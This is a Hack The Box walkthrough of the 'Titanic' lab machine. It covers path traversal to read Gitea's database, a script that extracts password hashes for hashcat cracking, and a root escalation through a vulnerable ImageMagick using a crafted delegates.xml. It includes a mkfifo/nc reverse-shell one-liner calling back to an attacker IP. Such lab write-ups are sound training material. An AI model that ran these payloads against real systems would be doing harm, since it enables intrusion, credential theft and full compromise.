Titanic - Hack The Box Walkthrough

Summary

Titanic is an easy box that exposes a simple website and a Gitea instance. The website is an application that allows users to enter information for a Titanic ticket and then download it. However, when downloading the ticket, the application does not properly sanitize the file path, leading to a path traversal vulnerability that allows reading arbitrary files from the system.

Additionally, a Gitea instance is available, allowing user registration. By signing up, we gain access to a repository containing a docker-compose file that reveals the file path of Gitea’s data storage. Using this information, we can dump the SQLite database, extract a user’s password hash, crack it, and use it to SSH into the box.

On the target system, we discover a root-owned script that runs every minute and calls a vulnerable version of ImageMagick. This vulnerability allows us to execute arbitrary commands and escalate to root.

Initial Access

An initial nmap scan reveals that ports 22 and 80 are open:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

Nmap scan report for 10.129.137.253
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://titanic.htb/
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 23.53 seconds.

The scan indicates that the webserver’s hostname is titanic.htb. We add this to our /etc/hosts file to resolve the domain locally.

Upon visiting titanic.htb in Burp Suite’s built-in browser, we find a simple website that allows users to book Titanic tickets. After submitting a ticket, we receive a JSON download of the ticket.

Path Traversal Vulnerability

Examining the request in Burp Suite, we see that the /download endpoint is called with a ticket parameter that specifies the file path. Sending the request to Burp Repeater reveals a path traversal vulnerability that allows us to read arbitrary files:

More details on this type of vulnerability can be found here: OWASP Path Traversal.

By leveraging this vulnerability, we explore the system and find /etc/hosts, which reveals another hostname: dev.titanic.htb.

After adding dev.titanic.htb to our /etc/hosts file, we visit it in our browser and discover a Gitea instance.

Exploiting Gitea

After signing up on Gitea, we find that the developer user has a repository containing docker-compose files for MySQL and Gitea. The Gitea docker-compose.yml file reveals the data storage path:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

version: '3'

services:
  gitea:
    image: gitea/gitea
    container_name: gitea
    ports:
      - "127.0.0.1:3000:3000"
      - "127.0.0.1:2222:22"  # Optional for SSH access
    volumes:
      - /home/developer/gitea/data:/data  # Data storage path
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always

To extract valuable information from Gitea, it’s useful to understand the data folder structure. Running this docker-compose file locally (after adjusting the mount path) helps us determine that the Gitea configuration file is located at:

1

../../../../../../../../home/developer/gitea/data/gitea/conf/app.ini

This file reveals that Gitea uses an SQLite database, which we can download using:

1

../../../../../../../../home/developer/gitea/data/gitea/gitea.db

It’s recommended to download this file via a browser instead of Burp Repeater to prevent corruption.

Extracting and Cracking the Hash

Once we have the database, we dump the password hashes using:

1
2
3
4
5
6

sqlite3 gitea.db "SELECT name, passwd, salt FROM user" | while read -r line; do
    salt="$(echo "$line" | awk -F'|' '{print $3}' | xxd -p -r | base64)"
    digest="$(echo "$line" | awk -F'|' '{print $2}' | xxd -p -r | base64)"
    username="$(echo "$line" | awk -F'|' '{print $1}')"
    echo "${username}:sha256:50000:${salt}:${digest}"
done

This gives us the hash of the developer user. We then crack it using:

1

hashcat --user hash.txt /usr/share/wordlists/rockyou.txt

With the cracked password, we can SSH into the box.

Privilege Escalation (Developer to Root)

Exploring the filesystem, we find a script at /opt/scripts/identify_images.sh. Examining its contents, we see that it moves into the /opt/app/static/assets/images directory, clears a metadata file, finds all .jpg files, and passes them to ImageMagick for metadata extraction.

We determine that this script runs every minute by checking the modification time of /opt/app/static/assets/images/metadata.log:

1
2
3
4

developer@titanic:/opt/scripts$ date
Mon Feb 17 01:18:04 AM UTC 2025
developer@titanic:/opt/scripts$ ls -l /opt/app/static/assets/images/metadata.log 
-rw-r----- 1 root developer 442 Feb 17 01:18 /opt/app/static/assets/images/metadata.log

Exploiting ImageMagick

Checking the installed version:

1
2

developer@titanic:/opt/scripts$ /usr/bin/magick -version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org

A Google search for "ImageMagick 7.1.1-35 Q16-HDRI x86_64 poc" leads to this security advisory, which describes a vulnerability that allows arbitrary command execution using a crafted .xml file.

We exploit this by creating a malicious delegates.xml file:

1
2
3
4
5
6
7

cd /opt/app/static/assets/images

cat << EOF > ./delegates.xml
<delegatemap><delegate xmlns="" decode="XML" command="/tmp/s.sh"/></delegatemap>
EOF

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.149 8888 >/tmp/f' > /tmp/s.sh && chmod +x /tmp/s.sh

Next, we create a file that triggers the exploit:

1

touch -- 'delegates.xml test.jpg'

Finally, we set up a listener to catch the reverse shell:

1

nc -lnvp 8888

And that’s it! We successfully gain root access.

Final Thoughts

This box demonstrates the importance of proper input validation, secure file permissions, and regular software updates. The path traversal vulnerability, exposed Gitea instance, and ImageMagick exploit highlight common security flaws that can lead to full system compromise.